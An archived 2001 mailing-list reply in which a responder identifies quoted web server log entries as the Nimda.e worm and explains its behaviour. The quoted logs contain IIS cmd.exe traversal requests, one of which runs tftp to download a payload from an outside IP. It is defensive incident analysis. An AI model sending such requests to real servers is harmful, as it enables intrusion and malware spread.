On Mon, 29 Oct 2001, Aj Effin Reznor wrote: > [29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 200 394 "-" "-" > [29/Oct/2001:17:09:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll > HTTP/1.0" 200 449 "-" "-" >[29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 >"-" "-" As someone pointed out, this is Nimda.e . What's going on here is that since your web server is responding with a 200 to the exploit attempt, it thinks it has found a vulnerable victim. So it issues the tftp command to try and make your web server download a copy. Then it sends a command to try to execute the file it thinks it has caused you to download. Ryan ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Oct 30 2001 - 09:41:08 PST